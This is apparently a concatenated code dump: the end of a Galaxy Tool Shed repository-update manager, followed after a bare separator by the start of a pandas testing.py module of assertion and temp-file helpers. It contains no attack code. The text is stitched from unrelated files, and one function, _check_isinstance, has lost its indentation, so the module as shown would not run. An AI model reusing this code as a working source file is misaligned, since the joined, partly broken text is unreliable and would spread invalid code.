        params = '?name=%s&owner=%s&changeset_revision=%s' % ( str( repository.name ),
                                                               str( repository.owner ),
                                                               str( repository.installed_changeset_revision ) )
        url = common_util.url_join( tool_shed_url, 'repository/get_changeset_revision_and_ctx_rev%s' % params )
        try:
            encoded_update_dict = common_util.tool_shed_get( self.app, tool_shed_url, url )
            if encoded_update_dict:
                update_dict = encoding_util.tool_shed_decode( encoded_update_dict )
                # Copy each expected key out of the response, falling back to
                # its documented default when the key is missing.
                for key, default in self.UPDATE_DICT_DEFAULTS.items():
                    changeset_revision_dict[ key ] = update_dict.get( key, default )
        except Exception as e:
            log.debug( "Error getting change set revision for update from the tool shed for repository '%s': %s" % ( repository.name, str( e ) ) )
            # On failure, report the conservative defaults for every key.
            changeset_revision_dict = dict( self.UPDATE_DICT_DEFAULTS )
        return changeset_revision_dict

    def __restarter( self ):
        """Background loop: refresh tool_shed_status for every installed repository."""
        log.info( 'Update repository manager restarter starting up...' )
        while self.running:
            # Make a call to the Tool Shed for each installed repository to get the latest
            # status information in the Tool Shed for the repository.  This information includes
            # items like newer installable repository revisions, current revision updates, whether
            # the repository revision is the latest installable revision, and whether the repository
            # has been deprecated in the Tool Shed.
            for repository in self.context.query( self.app.install_model.ToolShedRepository ) \
                                          .filter( self.app.install_model.ToolShedRepository.table.c.deleted == False ):
                tool_shed_status_dict = suc.get_tool_shed_status_for_installed_repository( self.app, repository )
                if not tool_shed_status_dict:
                    # The received tool_shed_status_dict is an empty dictionary, so coerce to None.
                    tool_shed_status_dict = None
                # Only touch the database when the status actually changed.
                if tool_shed_status_dict != repository.tool_shed_status:
                    repository.tool_shed_status = tool_shed_status_dict
                    self.context.flush()
            self.sleeper.sleep( self.seconds_to_sleep )
        log.info( 'Update repository manager restarter shutting down...' )

    def shutdown( self ):
        """Stop the restarter thread (wakes it if it is sleeping)."""
        if self.app.config.enable_tool_shed_check:
            self.running = False
            self.sleeper.wake()

    def update_repository_record( self, repository, updated_metadata_dict, updated_changeset_revision, updated_ctx_rev ):
        """
        Update a tool_shed_repository database record with new information retrieved from the
        Tool Shed.  This happens when updating an installed repository to a new changeset revision.
        """
        repository.metadata = updated_metadata_dict
        # Update the repository.changeset_revision column in the database.
        repository.changeset_revision = updated_changeset_revision
        repository.ctx_rev = updated_ctx_rev
        # Update the repository.tool_shed_status column in the database.
        tool_shed_status_dict = suc.get_tool_shed_status_for_installed_repository( self.app, repository )
        if tool_shed_status_dict:
            repository.tool_shed_status = tool_shed_status_dict
        else:
            repository.tool_shed_status = None
        self.app.install_model.context.add( repository )
        self.app.install_model.context.flush()
        self.app.install_model.context.refresh( repository )
        return repository
class Sleeper( object ):
    """
    Interruptible sleep.  sleep() blocks for up to the given number of
    seconds, but returns early if wake() is called from another thread.
    """

    def __init__( self ):
        self.condition = threading.Condition()

    def sleep( self, seconds ):
        # wait() releases the condition lock while blocking, which lets a
        # concurrent wake() acquire it and notify us.
        with self.condition:
            self.condition.wait( seconds )

    def wake( self ):
        with self.condition:
            self.condition.notify()
|
testing.py | import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import http.client
import lzma
import os
import re
from shutil import rmtree
import string
import tempfile
import traceback
from typing import Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas.compat import raise_with_traceback
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
# Default dimensions used by this module's random frame/series builders.
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False

# set testing_mode
# Warning categories toggled by the PANDAS_TESTING_MODE environment variable.
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
    """Enable the testing-mode warning filters requested via the environment."""
    mode = os.environ.get("PANDAS_TESTING_MODE", "None")
    if "deprecate" in mode:
        warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
    """Remove the testing-mode warning filters requested via the environment."""
    mode = os.environ.get("PANDAS_TESTING_MODE", "None")
    if "deprecate" in mode:
        warnings.simplefilter("ignore", _testing_mode_warnings)
# Install the testing-mode warning filters at import time.
set_testing_mode()
def reset_display_options():
    """
    Restore every option in the ``display`` namespace to its default,
    suppressing deprecation chatter while doing so.
    """
    pd.reset_option("^display.", silent=True)
def round_trip_pickle(obj, path=None):
    """
    Pickle an object and then read it again.

    Parameters
    ----------
    obj : pandas object
        The object to pickle and then re-read.
    path : str, default None
        The path where the pickled object is written and then read.

    Returns
    -------
    round_trip_pickled_object : pandas object
        The original object that was pickled and then re-read.
    """
    if path is None:
        # Use a random name so concurrent test runs cannot collide.
        path = "__{random_bytes}__.pickle".format(random_bytes=rands(10))
    with ensure_clean(path) as temp_path:
        pd.to_pickle(obj, temp_path)
        return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path=None):
    """
    Write an object to file specified by a pathlib.Path and read it back.

    Parameters
    ----------
    writer : callable bound to pandas object
        IO writing function (e.g. DataFrame.to_csv )
    reader : callable
        IO reading function (e.g. pd.read_csv )
    path : str, default None
        The path where the object is written and then read.

    Returns
    -------
    round_trip_object : pandas object
        The original object that was serialized and then re-read.
    """
    import pytest

    Path = pytest.importorskip("pathlib").Path
    if path is None:
        path = "___pathlib___"
    with ensure_clean(path) as temp_path:
        target = Path(temp_path)
        writer(target)
        return reader(target)
def round_trip_localpath(writer, reader, path=None):
    """
    Write an object to file specified by a py.path LocalPath and read it back.

    Parameters
    ----------
    writer : callable bound to pandas object
        IO writing function (e.g. DataFrame.to_csv )
    reader : callable
        IO reading function (e.g. pd.read_csv )
    path : str, default None
        The path where the object is written and then read.

    Returns
    -------
    round_trip_object : pandas object
        The original object that was serialized and then re-read.
    """
    import pytest

    LocalPath = pytest.importorskip("py.path").local
    if path is None:
        path = "___localpath___"
    with ensure_clean(path) as temp_path:
        target = LocalPath(temp_path)
        writer(target)
        return reader(target)
@contextmanager
def decompress_file(path, compression):
    """
    Open a compressed file and return a file object.

    Parameters
    ----------
    path : str
        The path where the file is read from
    compression : {'gzip', 'bz2', 'zip', 'xz', None}
        Name of the decompression to use

    Returns
    -------
    f : file object
    """
    # Constructors for the single-file compression formats.
    openers = {"gzip": gzip.open, "bz2": bz2.BZ2File, "xz": lzma.LZMAFile}
    zip_file = None
    if compression is None:
        f = open(path, "rb")
    elif compression == "zip":
        zip_file = zipfile.ZipFile(path)
        zip_names = zip_file.namelist()
        if len(zip_names) == 1:
            f = zip_file.open(zip_names.pop())
        else:
            raise ValueError("ZIP file {} error. Only one file per ZIP.".format(path))
    elif compression in openers:
        f = openers[compression](path, "rb")
    else:
        msg = "Unrecognized compression type: {}".format(compression)
        raise ValueError(msg)
    try:
        yield f
    finally:
        f.close()
        if compression == "zip":
            zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
    """
    Write data to a compressed file.

    Parameters
    ----------
    compression : {'gzip', 'bz2', 'zip', 'xz'}
        The compression type to use.
    path : str
        The file path to write the data.
    data : str
        The data to write.
    dest : str, default "test"
        The destination file (for ZIP only)

    Raises
    ------
    ValueError : An invalid compression value was passed in.
    """
    # The compression modules are already imported at module level; no need
    # for the redundant function-local imports the old implementation had.
    compress_methods = {
        "zip": zipfile.ZipFile,
        "gzip": gzip.GzipFile,
        "bz2": bz2.BZ2File,
        "xz": lzma.LZMAFile,
    }
    if compression not in compress_methods:
        msg = "Unrecognized compression type: {}".format(compression)
        raise ValueError(msg)
    if compression == "zip":
        # ZIP archives need a member name, so data is written via writestr.
        mode = "w"
        args = (dest, data)
        method = "writestr"
    else:
        mode = "wb"
        args = (data,)
        method = "write"
    with compress_methods[compression](path, mode=mode) as f:
        getattr(f, method)(*args)
def assert_almost_equal(
    left, right, check_dtype="equiv", check_less_precise=False, **kwargs
):
    """
    Check that the left and right objects are approximately equal.

    By approximately equal, we refer to objects that are numbers or that
    contain numbers which may be equivalent to specific levels of precision.

    Parameters
    ----------
    left : object
    right : object
    check_dtype : bool / string {'equiv'}, default 'equiv'
        Check dtype if both a and b are the same type. If 'equiv' is passed in,
        then `RangeIndex` and `Int64Index` are also considered equivalent
        when doing type checking.
    check_less_precise : bool or int, default False
        Specify comparison precision. 5 digits (False) or 3 digits (True)
        after decimal points are compared. If int, then specify the number
        of digits to compare.
        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.
    """
    # Dispatch to the specialized comparator based on the left operand.
    if isinstance(left, pd.Index):
        assert_index_equal(
            left,
            right,
            check_exact=False,
            exact=check_dtype,
            check_less_precise=check_less_precise,
            **kwargs
        )
        return
    if isinstance(left, pd.Series):
        assert_series_equal(
            left,
            right,
            check_exact=False,
            check_dtype=check_dtype,
            check_less_precise=check_less_precise,
            **kwargs
        )
        return
    if isinstance(left, pd.DataFrame):
        assert_frame_equal(
            left,
            right,
            check_exact=False,
            check_dtype=check_dtype,
            check_less_precise=check_less_precise,
            **kwargs
        )
        return
    # Other sequences: validate classes first (unless both sides are plain
    # numbers or plain bools, whose concrete classes may legitimately differ,
    # e.g. np.float64 vs float).
    if check_dtype:
        both_numbers = is_number(left) and is_number(right)
        both_bools = is_bool(left) and is_bool(right)
        if not both_numbers and not both_bools:
            if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
                obj = "numpy array"
            else:
                obj = "Input"
            assert_class_equal(left, right, obj=obj)
    _testing.assert_almost_equal(
        left,
        right,
        check_dtype=check_dtype,
        check_less_precise=check_less_precise,
        **kwargs
    )
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
err_msg = "{name} Expected type {exp_type}, found {act_type} instead"
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(left))
)
if not isinstance(right, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(right))
)
def assert_dict_equal(left, right, compare_keys=True):
    """Assert that two dicts are equal; both operands must be plain dicts."""
    _check_isinstance(left, right, dict)
    _testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p=0.5):
    """Return a random boolean array of shape *size*, True with probability *p*."""
    return rand(*size) <= p
# Character pool for random byte-string helpers (rands / rands_array):
# ASCII letters plus digits, stored as single-character fixed-width strings.
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
# Character pool for random unicode helpers (randu / randu_array):
# 26 codepoints starting at U+05D0 (Hebrew block) plus ASCII digits.
RANDU_CHARS = np.array(
    list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
    dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
    """Generate an array of byte strings."""
    # Draw nchars characters per element, then reinterpret the flat character
    # buffer as fixed-width strings of length nchars.
    chars = np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
    strings = chars.view((np.str_, nchars)).reshape(size)
    if dtype is None:
        return strings
    return strings.astype(dtype)
def randu_array(nchars, size, dtype="O"):
    """Generate an array of unicode strings."""
    # Draw nchars characters per element, then reinterpret the flat character
    # buffer as fixed-width unicode strings of length nchars.
    chars = np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
    strings = chars.view((np.unicode_, nchars)).reshape(size)
    if dtype is None:
        return strings
    return strings.astype(dtype)
def rands(nchars):
    """
    Generate one random byte string.

    See `rands_array` if you want to create an array of random strings.
    """
    chosen = np.random.choice(RANDS_CHARS, nchars)
    return "".join(chosen)
def randu(nchars):
    """
    Generate one random unicode string.

    See `randu_array` if you want to create an array of random unicode strings.
    """
    chosen = np.random.choice(RANDU_CHARS, nchars)
    return "".join(chosen)
def close(fignum=None):
    """Close the matplotlib figure numbered *fignum*, or every open figure if None."""
    from matplotlib.pyplot import get_fignums, close as _close

    if fignum is not None:
        _close(fignum)
        return
    for num in get_fignums():
        _close(num)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
    """Gets a temporary path and agrees to remove on close.

    Parameters
    ----------
    filename : str (optional)
        if None, creates a temporary file which is then removed when out of
        scope. if passed, creates temporary file with filename as ending.
    return_filelike : bool (default False)
        if True, returns a file-like which is *always* cleaned. Necessary for
        savefig and other functions which want to append extensions.
    """
    suffix = filename or ""
    if return_filelike:
        handle = tempfile.TemporaryFile(suffix=suffix)
        try:
            yield handle
        finally:
            handle.close()
        return
    # don't generate tempfile if using a path with directory specified
    if os.path.dirname(suffix):
        raise ValueError("Can't pass a qualified name to ensure_clean()")
    try:
        fd, path = tempfile.mkstemp(suffix=suffix)
    except UnicodeEncodeError:
        import pytest

        pytest.skip("no unicode file names on this system")
    try:
        yield path
    finally:
        # Best-effort cleanup: report, but never raise, on failure so the
        # caller's own exception (if any) is not masked.
        try:
            os.close(fd)
        except Exception:
            print(
                "Couldn't close file descriptor: {fdesc} (file: {fname})".format(
                    fdesc=fd, fname=path
                )
            )
        try:
            if os.path.exists(path):
                os.remove(path)
        except Exception as e:
            print("Exception on removing file: {error}".format(error=e))
@contextmanager
def ensure_clean_dir():
    """
    Get a temporary directory path and agrees to remove on close.

    Yields
    ------
    Temporary directory path
    """
    path = tempfile.mkdtemp(suffix="")
    try:
        yield path
    finally:
        # Best-effort removal; ignore failures (e.g. files still open on
        # Windows) rather than masking the caller's exception.
        try:
            rmtree(path)
        except Exception:
            pass
@contextmanager
def ensure_safe_environment_variables():
    """
    Get a context manager to safely set environment variables

    All changes will be undone on close, hence environment variables set
    within this contextmanager will neither persist nor change global state.
    """
    snapshot = dict(os.environ)
    try:
        yield
    finally:
        # Restore the exact pre-context environment, removing any additions.
        os.environ.clear()
        os.environ.update(snapshot)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2):
    """Checks if the set of unique elements of arr1 and arr2 are equivalent.
    """
    left_unique = frozenset(arr1)
    right_unique = frozenset(arr2)
    return left_unique == right_unique
def assert_index_equal(
    left: Index,
    right: Index,
    exact: Union[bool, str] = "equiv",
    check_names: bool = True,
    check_less_precise: Union[bool, int] = False,
    check_exact: bool = True,
    check_categorical: bool = True,
    obj: str = "Index",
) -> None:
    """Check that left and right Index are equal.
    Parameters
    ----------
    left : Index
    right : Index
    exact : bool / string {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical. If 'equiv', then RangeIndex can be substituted for
        Int64Index as well.
    check_names : bool, default True
        Whether to check the names attribute.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare
    check_exact : bool, default True
        Whether to compare number exactly.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    obj : str, default 'Index'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    __tracebackhide__ = True
    def _check_types(l, r, obj="Index"):
        # Compare class, dtype and inferred_type; `exact` and
        # `check_categorical` are closed over from the enclosing call.
        if exact:
            assert_class_equal(l, r, exact=exact, obj=obj)
            # Skip exact dtype checking when `check_categorical` is False
            if check_categorical:
                assert_attr_equal("dtype", l, r, obj=obj)
            # allow string-like to have different inferred_types
            if l.inferred_type in ("string", "unicode"):
                assert r.inferred_type in ("string", "unicode")
            else:
                assert_attr_equal("inferred_type", l, r, obj=obj)
    def _get_ilevel_values(index, level):
        # accept level number only
        # Materialize one MultiIndex level as a flat Index; codes are
        # expanded against the level values, filling with the NA value.
        unique = index.levels[level]
        labels = index.codes[level]
        filled = take_1d(unique.values, labels, fill_value=unique._na_value)
        values = unique._shallow_copy(filled, name=index.names[level])
        return values
    # instance validation
    _check_isinstance(left, right, Index)
    # class / dtype comparison
    _check_types(left, right, obj=obj)
    # level comparison
    if left.nlevels != right.nlevels:
        msg1 = "{obj} levels are different".format(obj=obj)
        msg2 = "{nlevels}, {left}".format(nlevels=left.nlevels, left=left)
        msg3 = "{nlevels}, {right}".format(nlevels=right.nlevels, right=right)
        raise_assert_detail(obj, msg1, msg2, msg3)
    # length comparison
    if len(left) != len(right):
        msg1 = "{obj} length are different".format(obj=obj)
        msg2 = "{length}, {left}".format(length=len(left), left=left)
        msg3 = "{length}, {right}".format(length=len(right), right=right)
        raise_assert_detail(obj, msg1, msg2, msg3)
    # MultiIndex special comparison for little-friendly error messages
    if left.nlevels > 1:
        left = cast(MultiIndex, left)
        right = cast(MultiIndex, right)
        # Recurse level by level so a failure names the offending level.
        for level in range(left.nlevels):
            # cannot use get_level_values here because it can change dtype
            llevel = _get_ilevel_values(left, level)
            rlevel = _get_ilevel_values(right, level)
            lobj = "MultiIndex level [{level}]".format(level=level)
            assert_index_equal(
                llevel,
                rlevel,
                exact=exact,
                check_names=check_names,
                check_less_precise=check_less_precise,
                check_exact=check_exact,
                obj=lobj,
            )
            # get_level_values may change dtype
            _check_types(left.levels[level], right.levels[level], obj=obj)
    # skip exact index checking when `check_categorical` is False
    if check_exact and check_categorical:
        if not left.equals(right):
            # Report the percentage of differing positions.
            diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
            msg = "{obj} values are different ({pct} %)".format(
                obj=obj, pct=np.round(diff, 5)
            )
            raise_assert_detail(obj, msg, left, right)
    else:
        _testing.assert_almost_equal(
            left.values,
            right.values,
            check_less_precise=check_less_precise,
            check_dtype=exact,
            obj=obj,
            lobj=left,
            robj=right,
        )
    # metadata comparison
    if check_names:
        assert_attr_equal("names", left, right, obj=obj)
    if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
        assert_attr_equal("freq", left, right, obj=obj)
    if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
        assert_interval_array_equal(left.values, right.values)
    if check_categorical:
        if is_categorical_dtype(left) or is_categorical_dtype(right):
            assert_categorical_equal(
                left.values, right.values, obj="{obj} category".format(obj=obj)
            )
def assert_class_equal(left, right, exact=True, obj="Input"):
    """checks classes are equal."""
    __tracebackhide__ = True

    def repr_class(x):
        # Indexes render their values in the error message; anything else is
        # shown by class name (falling back to repr of its type).
        if isinstance(x, Index):
            # return Index as it is to include values in the error message
            return x
        try:
            return x.__class__.__name__
        except AttributeError:
            return repr(type(x))

    same_type = type(left) == type(right)
    if exact == "equiv":
        if not same_type:
            # allow equivalence of Int64Index/RangeIndex
            names = {type(left).__name__, type(right).__name__}
            if names - {"Int64Index", "RangeIndex"}:
                msg = "{obj} classes are not equivalent".format(obj=obj)
                raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
    elif exact:
        if not same_type:
            msg = "{obj} classes are different".format(obj=obj)
            raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
    """checks attributes are equal. Both objects must have attribute.

    Parameters
    ----------
    attr : str
        Attribute name being compared.
    left : object
    right : object
    obj : str, default 'Attributes'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    __tracebackhide__ = True
    left_attr = getattr(left, attr)
    right_attr = getattr(right, attr)
    # Identity short-circuit covers shared objects (and identical NaN objects).
    if left_attr is right_attr:
        return True
    if (
        is_number(left_attr)
        and np.isnan(left_attr)
        and is_number(right_attr)
        and np.isnan(right_attr)
    ):
        # np.nan
        return True
    try:
        result = left_attr == right_attr
    except TypeError:
        # datetimetz on rhs may raise TypeError
        result = False
    if not isinstance(result, bool):
        # array-like comparison result: require every element to match
        result = result.all()
    if result:
        return True
    msg = 'Attribute "{attr}" are different'.format(attr=attr)
    raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
    """Assert that `objs` is an acceptable return value from a plotting call:
    either an array/Series of Axes (or dicts), or a single Artist/tuple/dict.
    """
    import matplotlib.pyplot as plt

    # A Series/ndarray return must contain Axes (or dict) elements.
    if isinstance(objs, (pd.Series, np.ndarray)):
        for el in objs.ravel():
            msg = (
                "one of 'objs' is not a matplotlib Axes instance, type "
                "encountered {name!r}"
            ).format(name=el.__class__.__name__)
            assert isinstance(el, (plt.Axes, dict)), msg
    else:
        # Scalar return: a single Artist, tuple, or dict is acceptable.
        assert isinstance(objs, (plt.Artist, tuple, dict)), (
            "objs is neither an ndarray of Artist instances nor a "
            'single Artist instance, tuple, or dict, "objs" is a {name!r}'.format(
                name=objs.__class__.__name__
            )
        )
def isiterable(obj):
    """Return True if *obj* exposes the iterator protocol via ``__iter__``."""
    return hasattr(obj, "__iter__")
def assert_is_sorted(seq):
    """Assert that the sequence is sorted."""
    # Work on the raw values for pandas containers.
    values = seq.values if isinstance(seq, (Index, Series)) else seq
    # sorting does not change precisions
    assert_numpy_array_equal(values, np.sort(np.array(values)))
def assert_categorical_equal(
    left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
    """Test that Categoricals are equivalent.
    Parameters
    ----------
    left : Categorical
    right : Categorical
    check_dtype : bool, default True
        Check that integer dtype of the codes are the same
    check_category_order : bool, default True
        Whether the order of the categories should be compared, which
        implies identical integer codes. If False, only the resulting
        values are compared. The ordered attribute is
        checked regardless.
    obj : str, default 'Categorical'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    _check_isinstance(left, right, Categorical)
    if check_category_order:
        # Strict comparison: categories and the integer codes must both match.
        assert_index_equal(
            left.categories, right.categories, obj="{obj}.categories".format(obj=obj)
        )
        assert_numpy_array_equal(
            left.codes,
            right.codes,
            check_dtype=check_dtype,
            obj="{obj}.codes".format(obj=obj),
        )
    else:
        # Order-insensitive: compare sorted categories and the reconstructed
        # values (categories taken at the codes).
        assert_index_equal(
            left.categories.sort_values(),
            right.categories.sort_values(),
            obj="{obj}.categories".format(obj=obj),
        )
        assert_index_equal(
            left.categories.take(left.codes),
            right.categories.take(right.codes),
            obj="{obj}.values".format(obj=obj),
        )
    assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
    """Test that two IntervalArrays are equivalent.
    Parameters
    ----------
    left, right : IntervalArray
        The IntervalArrays to compare.
    exact : bool / string {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical. If 'equiv', then RangeIndex can be substituted for
        Int64Index as well.
    obj : str, default 'IntervalArray'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    _check_isinstance(left, right, IntervalArray)
    assert_index_equal(
        left.left, right.left, exact=exact, obj="{obj}.left".format(obj=obj)
    )
    # BUG FIX: label this comparison ".right" — it previously reused ".left",
    # so a mismatch in right endpoints produced a misleading assertion message.
    assert_index_equal(
        left.right, right.right, exact=exact, obj="{obj}.right".format(obj=obj)
    )
    assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
    """Assert two PeriodArrays hold identical ordinal data and the same freq."""
    _check_isinstance(left, right, PeriodArray)
    assert_numpy_array_equal(left._data, right._data, obj="{obj}.values".format(obj=obj))
    assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
    """Assert two DatetimeArrays hold identical data and matching freq and tz."""
    __tracebackhide__ = True
    _check_isinstance(left, right, DatetimeArray)
    assert_numpy_array_equal(left._data, right._data, obj="{obj}._data".format(obj=obj))
    # freq is checked before tz, matching the original comparison order.
    for attr in ("freq", "tz"):
        assert_attr_equal(attr, left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
    """Assert two TimedeltaArrays hold identical data and the same freq."""
    __tracebackhide__ = True
    _check_isinstance(left, right, TimedeltaArray)
    assert_numpy_array_equal(
        left._data, right._data, obj="{obj}._data".format(obj=obj)
    )
    assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
    """Raise an AssertionError naming *obj*, the failure *message*, and both
    operands (plus an optional diff line)."""
    __tracebackhide__ = True
    # Convert array-likes to a printable representation for the message.
    if isinstance(left, np.ndarray):
        left = pprint_thing(left)
    elif is_categorical_dtype(left):
        left = repr(left)
    if isinstance(right, np.ndarray):
        right = pprint_thing(right)
    elif is_categorical_dtype(right):
        right = repr(right)
    msg = """{obj} are different
{message}
[left]: {left}
[right]: {right}""".format(
        obj=obj, message=message, left=left, right=right
    )
    if diff is not None:
        msg += "\n[diff]: {diff}".format(diff=diff)
    raise AssertionError(msg)
def assert_numpy_array_equal(
    left,
    right,
    strict_nan=False,
    check_dtype=True,
    err_msg=None,
    check_same=None,
    obj="numpy array",
):
    """ Checks that 'np.ndarray' is equivalent
    Parameters
    ----------
    left : np.ndarray or iterable
    right : np.ndarray or iterable
    strict_nan : bool, default False
        If True, consider NaN and None to be different.
    check_dtype: bool, default True
        check dtype if both a and b are np.ndarray
    err_msg : str, default None
        If provided, used as assertion message
    check_same : None|'copy'|'same', default None
        Ensure left and right refer/do not refer to the same memory area
    obj : str, default 'numpy array'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    __tracebackhide__ = True
    # instance validation
    # Show a detailed error message when classes are different
    assert_class_equal(left, right, obj=obj)
    # both classes must be an np.ndarray
    _check_isinstance(left, right, np.ndarray)
    def _get_base(obj):
        # Follow .base so views are compared by their owning buffer.
        return obj.base if getattr(obj, "base", None) is not None else obj
    left_base = _get_base(left)
    right_base = _get_base(right)
    if check_same == "same":
        # The two arrays are required to share memory.
        if left_base is not right_base:
            msg = "{left!r} is not {right!r}".format(left=left_base, right=right_base)
            raise AssertionError(msg)
    elif check_same == "copy":
        # The two arrays are required NOT to share memory.
        if left_base is right_base:
            msg = "{left!r} is {right!r}".format(left=left_base, right=right_base)
            raise AssertionError(msg)
    def _raise(left, right, err_msg):
        # Build and raise the failure: either a shape mismatch or the
        # percentage of differing elements; err_msg overrides both.
        if err_msg is None:
            if left.shape != right.shape:
                raise_assert_detail(
                    obj,
                    "{obj} shapes are different".format(obj=obj),
                    left.shape,
                    right.shape,
                )
            diff = 0
            for l, r in zip(left, right):
                # count up differences
                if not array_equivalent(l, r, strict_nan=strict_nan):
                    diff += 1
            diff = diff * 100.0 / left.size
            msg = "{obj} values are different ({pct} %)".format(
                obj=obj, pct=np.round(diff, 5)
            )
            raise_assert_detail(obj, msg, left, right)
        raise AssertionError(err_msg)
    # compare shape and values
    if not array_equivalent(left, right, strict_nan=strict_nan):
        _raise(left, right, err_msg)
    if check_dtype:
        if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
            assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
    left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
    """Check that left and right ExtensionArrays are equal.
    Parameters
    ----------
    left, right : ExtensionArray
        The two arrays to compare
    check_dtype : bool, default True
        Whether to check if the ExtensionArray dtypes are identical.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
    check_exact : bool, default False
        Whether to compare number exactly.
    Notes
    -----
    Missing values are checked separately from valid values.
    A mask of missing values is computed for each and checked to match.
    The remaining all-valid values are cast to object dtype and checked.
    """
    assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
    assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
    if check_dtype:
        assert_attr_equal("dtype", left, right, obj="ExtensionArray")
    if hasattr(left, "asi8") and type(right) == type(left):
        # Avoid slow object-dtype comparisons
        # (compare the underlying int64 representation instead)
        assert_numpy_array_equal(left.asi8, right.asi8)
        return
    # Compare NA masks first, then the valid values as object arrays.
    left_na = np.asarray(left.isna())
    right_na = np.asarray(right.isna())
    assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
    left_valid = np.asarray(left[~left_na].astype(object))
    right_valid = np.asarray(right[~right_na].astype(object))
    if check_exact:
        assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
    else:
        _testing.assert_almost_equal(
            left_valid,
            right_valid,
            check_dtype=check_dtype,
            check_less_precise=check_less_precise,
            obj="ExtensionArray",
        )
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
    left,
    right,
    check_dtype=True,
    check_index_type="equiv",
    check_series_type=True,
    check_less_precise=False,
    check_names=True,
    check_exact=False,
    check_datetimelike_compat=False,
    check_categorical=True,
    obj="Series",
):
    """Check that left and right Series are equal.
    Parameters
    ----------
    left : Series
    right : Series
    check_dtype : bool, default True
        Whether to check the Series dtype is identical.
    check_index_type : bool / string {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical.
    check_series_type : bool, default True
        Whether to check the Series class is identical.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.
